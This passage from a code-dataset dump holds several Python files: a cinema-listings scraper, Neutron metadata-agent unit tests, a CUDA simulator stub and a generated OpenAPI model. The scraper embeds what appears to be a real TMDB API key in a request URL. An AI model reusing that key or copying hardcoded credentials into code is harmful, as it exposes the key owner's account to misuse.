\"lxml\")\n\n # Parsing the html page to get the first url link in the google search\n # results, which will be the wikipedia page link\n g_search_res = soup.select('.r a')\n\n if not g_search_res:\n print 'VERY BAD: No google search results could be obtained'\n sys.stdout.flush()\n return ''\n\n fst_ref_url = g_search_res[0].get('href')\n\n if not fst_ref_url:\n print 'RED ALERT: First google search result has no href tag'\n sys.stdout.flush()\n return ''\n\n cinema_url = fst_ref_url.split('=')[1].split('&')[0]\n print(cinema_url)\n sys.stdout.flush()\n return cinema_url\n\n def fast_get_film_info(self, film_name):\n \"\"\"\n Given FILM_NAME, this will find the corresponding movie poster and\n return the image url for the movie poster.\n \"\"\"\n error_url = 'https://literalminded.files.wordpress.com' \\\n '/2010/11/image-unavailable1.png'\n error_overview = ''\n if '&' in film_name:\n film_name = 'and'.join(film_name.split('&'))\n\n film_name = film_name.encode('utf-8')\n api_url = 'https://api.themoviedb.org/3/search/movie?api_key=' \\\n 'ab499564677631cc1c25f6749d42a16e' \\\n '&language=en-US&query={}'.format(film_name)\n res = requests.get(api_url).json()\n\n if res['total_results'] == 0:\n return error_url, error_overview\n\n first_result = res['results'][0]\n\n poster_path = first_result['poster_path']\n if poster_path is None:\n img_url = error_url\n else:\n img_url = 'http://image.tmdb.org/t/p/w154' + poster_path\n\n overview = first_result['overview']\n if overview is None:\n overview = error_overview\n else:\n groups = overview.split('.')\n overview = '.'.join(groups[:2])\n if overview[-1] != '.':\n overview += '.'\n\n return img_url, overview\n\n def get_films_for_cinemas(self, date):\n \"\"\"\n Give this function a cinema ID and day and we can populate FILMS with\n all film showings and times.\n :param date: Date to get cinema films for.\n :return:\n \"\"\"\n global CINEMA_CID, CINEMA_DIST\n local_data = {}\n\n def get_films_for_cinema(cinema):\n # Get the cinema ID for a given cinema,\n # E.g. Cineworld London - Enfield: 10477\n cinema_id = CINEMA_CID[cinema]\n # Get list of films showing at this cinema\n url = \"https://mysterious-eyrie-40497.herokuapp.com/cinemas/{}/\" \\\n \"showings/{}\".format(cinema_id, date)\n #url = \"http://moviesapi.herokuapp.com/cinemas/{}/\" \\\n # \"showings/{}\".format(cinema_id, date)\n films = requests.get(url)\n # Create a JSON object storing film name, cinema, showtimes and\n # distance to the cinema.\n films_json = films.json()\n\n for i in films_json:\n filmname = i[\"title\"]\n times = i['time']\n if filmname in local_data:\n local_data[filmname][\"cinema\"].append(\n {cinema: [{\"showtimes\": times}]})\n else:\n local_data[filmname] = {}\n poster, overview = self.fast_get_film_info(filmname)\n local_data[filmname][\"image\"] = poster\n local_data[filmname][\"overview\"] = overview\n local_data[filmname][\"cinema\"] = \\\n [{cinema: [{\"showtimes\": times}]}]\n\n executor = concurrent.futures.ThreadPoolExecutor(NUM_OF_CINEMAS)\n futures = [executor.submit(get_films_for_cinema, cinema_name)\n for cinema_name in CINEMA_CID.keys()]\n concurrent.futures.wait(futures)\n\n return local_data\n\n def parse_date(self, day, month, year):\n \"\"\"Convert date into a suitable format for use by the external API.\"\"\"\n day = str(day)\n month = str(month)\n year = str(year)\n\n if len(day) == 1:\n day = \"0\" + day\n if len(month) == 1:\n month = \"0\" + month\n return year + \"-\" + month + \"-\" + day\n\n def get_local_data(self, day, month, year, latitude, longitude):\n \"\"\"Get all film data for a given location.\"\"\"\n self.get_cinemas_latlong(latitude, longitude)\n formatted_date = self.parse_date(day, month, year)\n return self.get_films_for_cinemas(formatted_date)\n\n\nif __name__ == '__main__':\n dParser = DataParser()\n # print dParser.get_latlong(\"en12lz\")\n start_time = time.time()\n pprint.PrettyPrinter(indent=4).pprint(\n dParser.get_local_data(25, 6, 2017, 51.636743, -0.069069))\n print dParser.get_cinema_url('Cineworld fullham road')\n print time.time() - start_time\n"} {"ext": "py", "sha": "1a314c00e6c61d3956b76b8d40b25886d14a7cfb", "content": "# Copyright 2012 New Dream Network, LLC (DreamHost)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport contextlib\n\nimport mock\nimport testtools\nimport webob\n\nfrom neutron.agent.linux import utils as agent_utils\nfrom neutron.agent.metadata import agent\nfrom neutron.agent import metadata_agent\nfrom neutron.common import constants\nfrom neutron.common import utils\nfrom neutron.tests import base\n\n\nclass FakeConf(object):\n admin_user = 'neutron'\n admin_password = 'password'\n admin_tenant_name = 'tenant'\n auth_url = 'http://127.0.0.1'\n auth_strategy = 'keystone'\n auth_region = 'region'\n auth_insecure = False\n auth_ca_cert = None\n endpoint_type = 'adminURL'\n nova_metadata_ip = '9.9.9.9'\n nova_metadata_port = 8775\n metadata_proxy_shared_secret = 'secret'\n nova_metadata_protocol = 'http'\n nova_metadata_insecure = True\n nova_client_cert = 'nova_cert'\n nova_client_priv_key = 'nova_priv_key'\n cache_url = ''\n\n\nclass FakeConfCache(FakeConf):\n cache_url = 'memory://?default_ttl=5'\n\n\nclass TestMetadataProxyHandlerBase(base.BaseTestCase):\n fake_conf = FakeConf\n\n def setUp(self):\n super(TestMetadataProxyHandlerBase, self).setUp()\n self.log_p = mock.patch.object(agent, 'LOG')\n self.log = self.log_p.start()\n self.handler = agent.MetadataProxyHandler(self.fake_conf)\n self.handler.plugin_rpc = mock.Mock()\n self.handler.context = mock.Mock()\n\n\nclass TestMetadataProxyHandlerRpc(TestMetadataProxyHandlerBase):\n def test_get_port_filters(self):\n router_id = 'test_router_id'\n ip = '1.2.3.4'\n networks = ('net_id1', 'net_id2')\n expected = {'device_id': [router_id],\n 'device_owner': constants.ROUTER_INTERFACE_OWNERS,\n 'network_id': networks,\n 'fixed_ips': {'ip_address': [ip]}}\n actual = self.handler._get_port_filters(router_id, ip, networks)\n self.assertEqual(expected, actual)\n\n def test_get_router_networks(self):\n router_id = 'router-id'\n expected = ('network_id1', 'network_id2')\n ports = [{'network_id': 'network_id1', 'something': 42},\n {'network_id': 'network_id2', 'something_else': 32}]\n self.handler.plugin_rpc.get_ports.return_value = ports\n networks = self.handler._get_router_networks(router_id)\n self.assertEqual(expected, networks)\n\n def test_get_ports_for_remote_address(self):\n ip = '1.1.1.1'\n networks = ('network_id1', 'network_id2')\n expected = [{'port_id': 'port_id1'},\n {'port_id': 'port_id2'}]\n self.handler.plugin_rpc.get_ports.return_value = expected\n ports = self.handler._get_ports_for_remote_address(ip, networks)\n self.assertEqual(expected, ports)\n\n def test_get_ports_using_rpc_fallback_to_client(self):\n ip = '1.1.1.1'\n networks = ('network_id1', 'network_id2')\n self.handler.plugin_rpc.get_ports.side_effect = AttributeError\n with mock.patch('neutronclient.v2_0.client.Client') as neutron_client:\n mock_list_ports = neutron_client.return_value.list_ports\n expected_ports = {'ports': ['expected_port']}\n mock_list_ports.return_value = expected_ports\n ports = self.handler._get_ports_from_server(ip_address=ip,\n networks=networks)\n self.assertEqual(expected_ports['ports'], ports)\n\n\nclass TestMetadataProxyHandlerCache(TestMetadataProxyHandlerBase):\n fake_conf = FakeConfCache\n\n def setUp(self):\n super(TestMetadataProxyHandlerCache, self).setUp()\n self.qclient_p = mock.patch('neutronclient.v2_0.client.Client')\n self.qclient = self.qclient_p.start()\n self.handler.use_rpc = False\n\n def test_call(self):\n req = mock.Mock()\n with mock.patch.object(self.handler,\n '_get_instance_and_tenant_id') as get_ids:\n get_ids.return_value = ('instance_id', 'tenant_id')\n with mock.patch.object(self.handler, '_proxy_request') as proxy:\n proxy.return_value = 'value'\n\n retval = self.handler(req)\n self.assertEqual(retval, 'value')\n\n def test_call_no_instance_match(self):\n req = mock.Mock()\n with mock.patch.object(self.handler,\n '_get_instance_and_tenant_id') as get_ids:\n get_ids.return_value = None, None\n retval = self.handler(req)\n self.assertIsInstance(retval, webob.exc.HTTPNotFound)\n\n def test_call_internal_server_error(self):\n req = mock.Mock()\n with mock.patch.object(self.handler,\n '_get_instance_and_tenant_id') as get_ids:\n get_ids.side_effect = Exception\n retval = self.handler(req)\n self.assertIsInstance(retval, webob.exc.HTTPInternalServerError)\n self.assertEqual(len(self.log.mock_calls), 2)\n\n def test_get_router_networks(self):\n router_id = 'router-id'\n expected = ('network_id1', 'network_id2')\n ports = {'ports': [{'network_id': 'network_id1', 'something': 42},\n {'network_id': 'network_id2',\n 'something_else': 32}],\n 'not_used': [1, 2, 3]}\n mock_list_ports = self.qclient.return_value.list_ports\n mock_list_ports.return_value = ports\n networks = self.handler._get_router_networks(router_id)\n mock_list_ports.assert_called_once_with(\n device_id=router_id,\n device_owner=constants.ROUTER_INTERFACE_OWNERS)\n self.assertEqual(expected, networks)\n\n def _test_get_router_networks_twice_helper(self):\n router_id = 'router-id'\n ports = {'ports': [{'network_id': 'network_id1', 'something': 42}],\n 'not_used': [1, 2, 3]}\n expected_networks = ('network_id1',)\n with mock.patch(\n 'oslo_utils.timeutils.utcnow_ts', return_value=0):\n mock_list_ports = self.qclient.return_value.list_ports\n mock_list_ports.return_value = ports\n networks = self.handler._get_router_networks(router_id)\n mock_list_ports.assert_called_once_with(\n device_id=router_id,\n device_owner=constants.ROUTER_INTERFACE_OWNERS)\n self.assertEqual(expected_networks, networks)\n networks = self.handler._get_router_networks(router_id)\n\n def test_get_router_networks_twice(self):\n self._test_get_router_networks_twice_helper()\n self.assertEqual(\n 1, self.qclient.return_value.list_ports.call_count)\n\n def _get_ports_for_remote_address_cache_hit_helper(self):\n remote_address = 'remote_address'\n networks = ('net1', 'net2')\n fixed_ips = [\"ip_address=%s\" % remote_address]\n mock_list_ports = self.qclient.return_value.list_ports\n mock_list_ports.return_value = {'ports': [{'network_id': 'net1',\n 'something': 42}]}\n self.handler._get_ports_for_remote_address(remote_address, networks)\n mock_list_ports.assert_called_once_with(\n network_id=networks, fixed_ips=fixed_ips)\n self.assertEqual(1, mock_list_ports.call_count)\n self.handler._get_ports_for_remote_address(remote_address,\n networks)\n\n def test_get_ports_for_remote_address_cache_hit(self):\n self._get_ports_for_remote_address_cache_hit_helper()\n self.assertEqual(\n 1, self.qclient.return_value.list_ports.call_count)\n\n def test_get_ports_network_id(self):\n network_id = 'network-id'\n router_id = 'router-id'\n remote_address = 'remote-address'\n expected = ['port1']\n networks = (network_id,)\n with contextlib.nested(\n mock.patch.object(self.handler, '_get_ports_for_remote_address'),\n mock.patch.object(self.handler, '_get_router_networks')\n ) as (mock_get_ip_addr, mock_get_router_networks):\n mock_get_ip_addr.return_value = expected\n ports = self.handler._get_ports(remote_address, network_id,\n router_id)\n mock_get_ip_addr.assert_called_once_with(remote_address,\n networks)\n self.assertFalse(mock_get_router_networks.called)\n self.assertEqual(expected, ports)\n\n def test_get_ports_router_id(self):\n router_id = 'router-id'\n remote_address = 'remote-address'\n expected = ['port1']\n networks = ('network1', 'network2')\n with contextlib.nested(\n mock.patch.object(self.handler,\n '_get_ports_for_remote_address',\n return_value=expected),\n mock.patch.object(self.handler,\n '_get_router_networks',\n return_value=networks)\n ) as (mock_get_ip_addr, mock_get_router_networks):\n ports = self.handler._get_ports(remote_address,\n router_id=router_id)\n mock_get_router_networks.called_once_with(router_id)\n mock_get_ip_addr.assert_called_once_with(remote_address, networks)\n self.assertEqual(expected, ports)\n\n def test_get_ports_no_id(self):\n self.assertRaises(TypeError, self.handler._get_ports, 'remote_address')\n\n def _get_instance_and_tenant_id_helper(self, headers, list_ports_retval,\n networks=None, router_id=None):\n remote_address = '192.168.1.1'\n headers['X-Forwarded-For'] = remote_address\n req = mock.Mock(headers=headers)\n\n def mock_list_ports(*args, **kwargs):\n return {'ports': list_ports_retval.pop(0)}\n\n self.qclient.return_value.list_ports.side_effect = mock_list_ports\n self.qclient.return_value.get_auth_info.return_value = {\n 'auth_token': None, 'endpoint_url': None}\n instance_id, tenant_id = self.handler._get_instance_and_tenant_id(req)\n new_qclient_call = mock.call(\n username=FakeConf.admin_user,\n tenant_name=FakeConf.admin_tenant_name,\n region_name=FakeConf.auth_region,\n auth_url=FakeConf.auth_url,\n password=FakeConf.admin_password,\n auth_strategy=FakeConf.auth_strategy,\n token=None,\n insecure=FakeConf.auth_insecure,\n ca_cert=FakeConf.auth_ca_cert,\n endpoint_url=None,\n endpoint_type=FakeConf.endpoint_type)\n\n expected = []\n\n if router_id:\n expected.extend([\n new_qclient_call,\n mock.call().list_ports(\n device_id=router_id,\n device_owner=constants.ROUTER_INTERFACE_OWNERS\n ),\n mock.call().get_auth_info()\n ])\n\n expected.extend([\n new_qclient_call,\n mock.call().list_ports(\n network_id=networks, fixed_ips=['ip_address=192.168.1.1']),\n mock.call().get_auth_info()\n ])\n\n self.qclient.assert_has_calls(expected)\n\n return (instance_id, tenant_id)\n\n def test_get_instance_id_router_id(self):\n router_id = 'the_id'\n headers = {\n 'X-Neutron-Router-ID': router_id\n }\n\n networks = ('net1', 'net2')\n ports = [\n [{'network_id': 'net1'}, {'network_id': 'net2'}],\n [{'device_id': 'device_id', 'tenant_id': 'tenant_id',\n 'network_id': 'net1'}]\n ]\n\n self.assertEqual(\n self._get_instance_and_tenant_id_helper(headers, ports,\n networks=networks,\n router_id=router_id),\n ('device_id', 'tenant_id')\n )\n\n def test_get_instance_id_router_id_no_match(self):\n router_id = 'the_id'\n headers = {\n 'X-Neutron-Router-ID': router_id\n }\n\n networks = ('net1', 'net2')\n ports = [\n [{'network_id': 'net1'}, {'network_id': 'net2'}],\n []\n ]\n self.assertEqual(\n self._get_instance_and_tenant_id_helper(headers, ports,\n networks=networks,\n router_id=router_id),\n (None, None)\n )\n\n def test_get_instance_id_network_id(self):\n network_id = 'the_id'\n headers = {\n 'X-Neutron-Network-ID': network_id\n }\n\n ports = [\n [{'device_id': 'device_id',\n 'tenant_id': 'tenant_id',\n 'network_id': 'the_id'}]\n ]\n\n self.assertEqual(\n self._get_instance_and_tenant_id_helper(headers, ports,\n networks=('the_id',)),\n ('device_id', 'tenant_id')\n )\n\n def test_get_instance_id_network_id_no_match(self):\n network_id = 'the_id'\n headers = {\n 'X-Neutron-Network-ID': network_id\n }\n\n ports = [[]]\n\n self.assertEqual(\n self._get_instance_and_tenant_id_helper(headers, ports,\n networks=('the_id',)),\n (None, None)\n )\n\n def test_auth_info_cache(self):\n router_id = 'the_id'\n list_ports = [\n [{'network_id': 'net1'}],\n [{'device_id': 'did', 'tenant_id': 'tid', 'network_id': 'net1'}]]\n\n def update_get_auth_info(*args, **kwargs):\n self.qclient.return_value.get_auth_info.return_value = {\n 'auth_token': 'token', 'endpoint_url': 'uri'}\n return {'ports': list_ports.pop(0)}\n\n self.qclient.return_value.list_ports.side_effect = update_get_auth_info\n\n new_qclient_call = mock.call(\n username=FakeConf.admin_user,\n tenant_name=FakeConf.admin_tenant_name,\n region_name=FakeConf.auth_region,\n auth_url=FakeConf.auth_url,\n password=FakeConf.admin_password,\n auth_strategy=FakeConf.auth_strategy,\n token=None,\n insecure=FakeConf.auth_insecure,\n ca_cert=FakeConf.auth_ca_cert,\n endpoint_url=None,\n endpoint_type=FakeConf.endpoint_type)\n\n cached_qclient_call = mock.call(\n username=FakeConf.admin_user,\n tenant_name=FakeConf.admin_tenant_name,\n region_name=FakeConf.auth_region,\n auth_url=FakeConf.auth_url,\n password=FakeConf.admin_password,\n auth_strategy=FakeConf.auth_strategy,\n token='token',\n insecure=FakeConf.auth_insecure,\n ca_cert=FakeConf.auth_ca_cert,\n endpoint_url='uri',\n endpoint_type=FakeConf.endpoint_type)\n\n headers = {'X-Forwarded-For': '192.168.1.10',\n 'X-Neutron-Router-ID': router_id}\n req = mock.Mock(headers=headers)\n self.handler._get_instance_and_tenant_id(req)\n\n expected = [\n new_qclient_call,\n mock.call().list_ports(\n device_id=router_id,\n device_owner=constants.ROUTER_INTERFACE_OWNERS\n ),\n mock.call().get_auth_info(),\n cached_qclient_call,\n mock.call().list_ports(network_id=('net1',),\n fixed_ips=['ip_address=192.168.1.10']),\n mock.call().get_auth_info(),\n ]\n\n self.qclient.assert_has_calls(expected)\n\n def _proxy_request_test_helper(self, response_code=200, method='GET'):\n hdrs = {'X-Forwarded-For': '8.8.8.8'}\n body = 'body'\n\n req = mock.Mock(path_info='/the_path', query_string='', headers=hdrs,\n method=method, body=body)\n resp = mock.MagicMock(status=response_code)\n req.response = resp\n with mock.patch.object(self.handler, '_sign_instance_id') as sign:\n sign.return_value = 'signed'\n with mock.patch('httplib2.Http') as mock_http:\n resp.__getitem__.return_value = \"text/plain\"\n mock_http.return_value.request.return_value = (resp, 'content')\n\n retval = self.handler._proxy_request('the_id', 'tenant_id',\n req)\n mock_http.assert_called_once_with(\n ca_certs=None, disable_ssl_certificate_validation=True)\n mock_http.assert_has_calls([\n mock.call().add_certificate(\n FakeConf.nova_client_priv_key,\n FakeConf.nova_client_cert,\n \"%s:%s\" % (FakeConf.nova_metadata_ip,\n FakeConf.nova_metadata_port)\n ),\n mock.call().request(\n 'http://9.9.9.9:8775/the_path',\n method=method,\n headers={\n 'X-Forwarded-For': '8.8.8.8',\n 'X-Instance-ID-Signature': 'signed',\n 'X-Instance-ID': 'the_id',\n 'X-Tenant-ID': 'tenant_id'\n },\n body=body\n )]\n )\n\n return retval\n\n def test_proxy_request_post(self):\n response = self._proxy_request_test_helper(method='POST')\n self.assertEqual(response.content_type, \"text/plain\")\n self.assertEqual(response.body, 'content')\n\n def test_proxy_request_200(self):\n response = self._proxy_request_test_helper(200)\n self.assertEqual(response.content_type, \"text/plain\")\n self.assertEqual(response.body, 'content')\n\n def test_proxy_request_400(self):\n self.assertIsInstance(self._proxy_request_test_helper(400),\n webob.exc.HTTPBadRequest)\n\n def test_proxy_request_403(self):\n self.assertIsInstance(self._proxy_request_test_helper(403),\n webob.exc.HTTPForbidden)\n\n def test_proxy_request_404(self):\n self.assertIsInstance(self._proxy_request_test_helper(404),\n webob.exc.HTTPNotFound)\n\n def test_proxy_request_409(self):\n self.assertIsInstance(self._proxy_request_test_helper(409),\n webob.exc.HTTPConflict)\n\n def test_proxy_request_500(self):\n self.assertIsInstance(self._proxy_request_test_helper(500),\n webob.exc.HTTPInternalServerError)\n\n def test_proxy_request_other_code(self):\n with testtools.ExpectedException(Exception):\n self._proxy_request_test_helper(302)\n\n def test_sign_instance_id(self):\n self.assertEqual(\n self.handler._sign_instance_id('foo'),\n '773ba44693c7553d6ee20f61ea5d2757a9a4f4a44d2841ae4e95b52e4cd62db4'\n )\n\n\nclass TestMetadataProxyHandlerNoCache(TestMetadataProxyHandlerCache):\n fake_conf = FakeConf\n\n def test_get_router_networks_twice(self):\n self._test_get_router_networks_twice_helper()\n self.assertEqual(\n 2, self.qclient.return_value.list_ports.call_count)\n\n def test_get_ports_for_remote_address_cache_hit(self):\n self._get_ports_for_remote_address_cache_hit_helper()\n self.assertEqual(\n 2, self.qclient.return_value.list_ports.call_count)\n\n\nclass TestUnixDomainMetadataProxy(base.BaseTestCase):\n def setUp(self):\n super(TestUnixDomainMetadataProxy, self).setUp()\n self.cfg_p = mock.patch.object(agent, 'cfg')\n self.cfg = self.cfg_p.start()\n looping_call_p = mock.patch(\n 'neutron.openstack.common.loopingcall.FixedIntervalLoopingCall')\n self.looping_mock = looping_call_p.start()\n self.cfg.CONF.metadata_proxy_socket = '/the/path'\n self.cfg.CONF.metadata_workers = 0\n self.cfg.CONF.metadata_backlog = 128\n\n @mock.patch.object(agent_utils, 'ensure_dir')\n def test_init_doesnot_exists(self, ensure_dir):\n agent.UnixDomainMetadataProxy(mock.Mock())\n ensure_dir.assert_called_once_with('/the')\n\n def test_init_exists(self):\n with mock.patch('os.path.isdir') as isdir:\n with mock.patch('os.unlink') as unlink:\n isdir.return_value = True\n agent.UnixDomainMetadataProxy(mock.Mock())\n unlink.assert_called_once_with('/the/path')\n\n def test_init_exists_unlink_no_file(self):\n with mock.patch('os.path.isdir') as isdir:\n with mock.patch('os.unlink') as unlink:\n with mock.patch('os.path.exists') as exists:\n isdir.return_value = True\n exists.return_value = False\n unlink.side_effect = OSError\n\n agent.UnixDomainMetadataProxy(mock.Mock())\n unlink.assert_called_once_with('/the/path')\n\n def test_init_exists_unlink_fails_file_still_exists(self):\n with mock.patch('os.path.isdir') as isdir:\n with mock.patch('os.unlink') as unlink:\n with mock.patch('os.path.exists') as exists:\n isdir.return_value = True\n exists.return_value = True\n unlink.side_effect = OSError\n\n with testtools.ExpectedException(OSError):\n agent.UnixDomainMetadataProxy(mock.Mock())\n unlink.assert_called_once_with('/the/path')\n\n @mock.patch.object(agent, 'MetadataProxyHandler')\n @mock.patch.object(agent_utils, 'UnixDomainWSGIServer')\n @mock.patch.object(agent_utils, 'ensure_dir')\n def test_run(self, ensure_dir, server, handler):\n p = agent.UnixDomainMetadataProxy(self.cfg.CONF)\n p.run()\n\n ensure_dir.assert_called_once_with('/the')\n server.assert_has_calls([\n mock.call('neutron-metadata-agent'),\n mock.call().start(handler.return_value,\n '/the/path', workers=0,\n backlog=128),\n mock.call().wait()]\n )\n\n def test_main(self):\n with mock.patch.object(agent, 'UnixDomainMetadataProxy') as proxy:\n with mock.patch.object(metadata_agent, 'config') as config:\n with mock.patch.object(metadata_agent, 'cfg') as cfg:\n with mock.patch.object(utils, 'cfg'):\n metadata_agent.main()\n\n self.assertTrue(config.setup_logging.called)\n proxy.assert_has_calls([\n mock.call(cfg.CONF),\n mock.call().run()]\n )\n\n def test_init_state_reporting(self):\n with mock.patch('os.makedirs'):\n proxy = agent.UnixDomainMetadataProxy(mock.Mock())\n self.looping_mock.assert_called_once_with(proxy._report_state)\n self.looping_mock.return_value.start.assert_called_once_with(\n interval=mock.ANY)\n\n def test_report_state(self):\n with mock.patch('neutron.agent.rpc.PluginReportStateAPI') as state_api:\n with mock.patch('os.makedirs'):\n proxy = agent.UnixDomainMetadataProxy(mock.Mock())\n self.assertTrue(proxy.agent_state['start_flag'])\n proxy._report_state()\n self.assertNotIn('start_flag', proxy.agent_state)\n state_api_inst = state_api.return_value\n state_api_inst.report_state.assert_called_once_with(\n proxy.context, proxy.agent_state, use_call=True)\n"} {"ext": "py", "sha": "1a314c6e2c20b483b369cb85d8c4a4a95c519d14", "content": "from .simulator import *\n\n\ndef is_available():\n \"\"\"Returns a boolean to indicate the availability of a CUDA GPU.\n \"\"\"\n # Simulator is always available\n return True\n\n\ndef cuda_error():\n \"\"\"Returns None or an exception if the CUDA driver fails to initialize.\n \"\"\"\n # Simulator never fails to initialize\n return None\n\n\n\n"} {"ext": "py", "sha": "1a314cf82308bb579c801cad55065a85d1e0e2e0", "content": "\"\"\"\n OpenAPI definition\n\n No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501\n\n The version of the OpenAPI document: v0\n Contact: support@gooddata.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport re # noqa: F401\nimport sys # noqa: F401\n\nfrom gooddata_metadata_client.model_utils import ( # noqa: F401\n ApiTypeError,\n ModelComposed,\n ModelNormal,\n ModelSimple,\n cached_property,\n change_keys_js_to_python,\n convert_js_args_to_python_args,\n date,\n datetime,\n file_type,\n none_type,\n validate_get_composed_info,\n OpenApiModel\n)\nfrom gooddata_metadata_client.exceptions import ApiAttributeError\n\n\ndef lazy_import():\n from gooddata_metadata_client.model.json_api_metric_patch_attributes import JsonApiMetricPatchAttributes\n globals()['JsonApiMetricPatchAttributes'] = JsonApiMetricPatchAttributes\n\n\nclass JsonApiMetricPatch(ModelNormal):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n\n Attributes:\n allowed_values (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n with a capitalized key describing the allowed value and an allowed\n value. These dicts store the allowed enum values.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n discriminator_value_class_map (dict): A dict to go from the discriminator\n variable value to the discriminator class name.\n validations (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n that stores validations for max_length, min_length, max_items,\n min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,\n inclusive_minimum, and regex.\n additional_properties_type (tuple): A tuple of classes accepted\n as additional properties values.\n \"\"\"\n\n allowed_values = {\n ('type',): {\n 'METRIC': \"metric\",\n },\n }\n\n validations = {\n ('id',): {\n 'regex': {\n 'pattern': r'^((?!\\.)[.A-Za-z0-9_-]{1,255}:)?(?!\\.)[.A-Za-z0-9_-]{1,255}$', # noqa: E501\n },\n },\n }\n\n @cached_property\n def additional_properties_type():\n \"\"\"\n This must be a method because a model may have properties that are\n of type self, this must run after the class is loaded\n \"\"\"\n lazy_import()\n return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501\n\n _nullable = False\n\n @cached_property\n def openapi_types():\n \"\"\"\n This must be a method because a model may have properties that are\n of type self, this must run after the class is loaded\n\n Returns\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n \"\"\"\n lazy_import()\n return {\n 'attributes': (JsonApiMetricPatchAttributes,), # noqa: E501\n 'id': (str,), # noqa: E501\n 'type': (str,), # noqa: E501\n }\n\n @cached_property\n def discriminator():\n return None\n\n\n attribute_map = {\n 'attributes': 'attributes', # noqa: E501\n 'id': 'id', # noqa: E501\n 'type': 'type', # noqa: E501\n }\n\n read_only_vars = {\n }\n\n _composed_schemas = {}\n\n @classmethod\n @convert_js_args_to_python_args\n def _from_openapi_data(cls, attributes, id, *args, **kwargs): # noqa: E501\n \"\"\"JsonApiMetricPatch - a model defined in OpenAPI\n\n Args:\n attributes (JsonApiMetricPatchAttributes):\n id (str): API identifier of an object\n\n Keyword Args:\n type (str): Object type. defaults to \"metric\", must be one of [\"metric\", ] # noqa: E501\n _check_type (bool): if True, values for parameters in openapi_types\n will be type checked and a TypeError will be\n raised if the wrong type is input.\n Defaults to True\n _path_to_item (tuple/list): This is a list of keys or values to\n drill down to the model in received_data\n when deserializing a response\n _spec_property_naming (bool): True if the variable names in the input data\n are serialized names, as specified in the OpenAPI document.\n False if the variable names in the input data\n are pythonic names, e.g. snake case (default)\n _configuration (Configuration): the instance to use when\n deserializing a file_type parameter.\n If passed, type conversion is attempted\n If omitted no type conversion is done.\n _visited_composed_classes (tuple): This stores a tuple of\n classes that we have traveled through so that\n if we see that class again we will not use its\n discriminator again.\n When traveling through a discriminator, the\n composed schema that is\n is traveled through is added to this set.\n For example if Animal has a discriminator\n petType and we pass in \"Dog\", and the class Dog\n allOf includes Animal, we move through Animal\n once using the discriminator, and pick Dog.\n Then in Dog, we will make an instance of the\n Animal class but this time we won't travel\n through its discriminator because we passed in\n _visited_composed_classes = (Animal,)\n \"\"\"\n\n type = kwargs.get('type', \"metric\")\n _check_type = kwargs.pop('_check_type', True)\n _spec_property_naming = kwargs.pop('_spec_property_naming', True)\n _path_to_item = kwargs.pop('_path_to_item', ())\n _configuration = kwargs.pop('_configuration', None)\n _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())\n\n self = super(OpenApiModel, cls).__new__(cls)\n\n if args:\n for arg in args:\n if isinstance(arg, dict):\n kwargs.update(arg)\n else:\n raise ApiTypeError(\n \"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.\" % (\n args,\n self.__class__.__name__,\n ),\n path_to_item=_path_to_item,\n valid_classes=(self.__class__,),\n )\n\n self._data_store = {}\n self._check_type = _check_type\n self._spec_property_naming = _spec_property_naming\n self._path_to_item = _path_to_item\n self._configuration = _configuration\n self._visited_composed_classes = _visited_composed_classes + (self.__class__,)\n\n self.attributes = attributes\n self.id = id\n self.type = type\n for var_name, var_value in kwargs.items():\n if var_name not in self.attribute_map and \\\n self._configuration is not None and \\\n self._configuration.discard_unknown_keys and \\\n self.additional_properties_type is None:\n # discard variable.\n continue\n setattr(self, var_name, var_value)\n return self\n\n required_properties = set([\n '_data_store',\n '_check_type',\n '_spec_property_naming',\n '_path_to_item',\n '_configuration',\n '_visited_composed_classes',\n ])\n\n @convert_js_args_to_python_args\n def __init__(self, attributes, id, *args, **kwargs): # noqa: E501\n \"\"\"JsonApiMetricPatch - a model defined in OpenAPI\n\n Args:\n attributes (JsonApiMetricPatchAttributes):\n id (str): API identifier of an object\n\n Keyword Args:\n type (str): Object type. defaults to \"metric\", must be one of [\"metric\", ] # noqa: E501\n _check_type (bool): if True, values for parameters in openapi_types\n will be type checked and a TypeError will be\n raised if the wrong type is input.\n Defaults to True\n _path_to_item (tuple/list): This is a list of keys or values to\n drill down to the model in received_data\n when deserializing a response\n _spec_property_naming (bool): True if the variable names in the input data\n are serialized names, as specified in the OpenAPI document.\n False if the variable names in the input data\n are pythonic names, e.g. snake case (default)\n _configuration (Configuration): the instance to use when\n deserializing a file_type parameter.\n If passed, type conversion is attempted\n If omitted no type conversion is done.\n _visited_composed_classes (tuple): This stores a tuple of\n classes that we have traveled through so that\n if we see that class again we will not use its\n discriminator again.\n When traveling through a discriminator, the\n composed schema that is\n is traveled through is added to this set.\n For example if Animal has a discriminator\n petType and we pass in \"Dog\", and the class Dog\n allOf includes Animal, we move through Animal\n once using the discriminator, and pick Dog.\n Then in Dog, we will make an instance of the\n Animal class but this time we won't travel\n through its discriminator because we passed in\n _visited_composed_classes = (Animal,)\n \"\"\"\n\n type = kwargs.get('type', \"metric\")\n _check_type = kwargs.pop('_check_type', True)\n _spec_property_naming = kwargs.pop('_spec_property_naming', False)\n _path_to_item = kwargs.pop('_path_to_item', ())\n _configuration = kwargs.pop('_configuration', None)\n _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())\n\n if args:\n for arg in args:\n if isinstance(arg, dict):\n kwargs.update(arg)\n else:\n raise ApiTypeError(\n \"Invalid positional 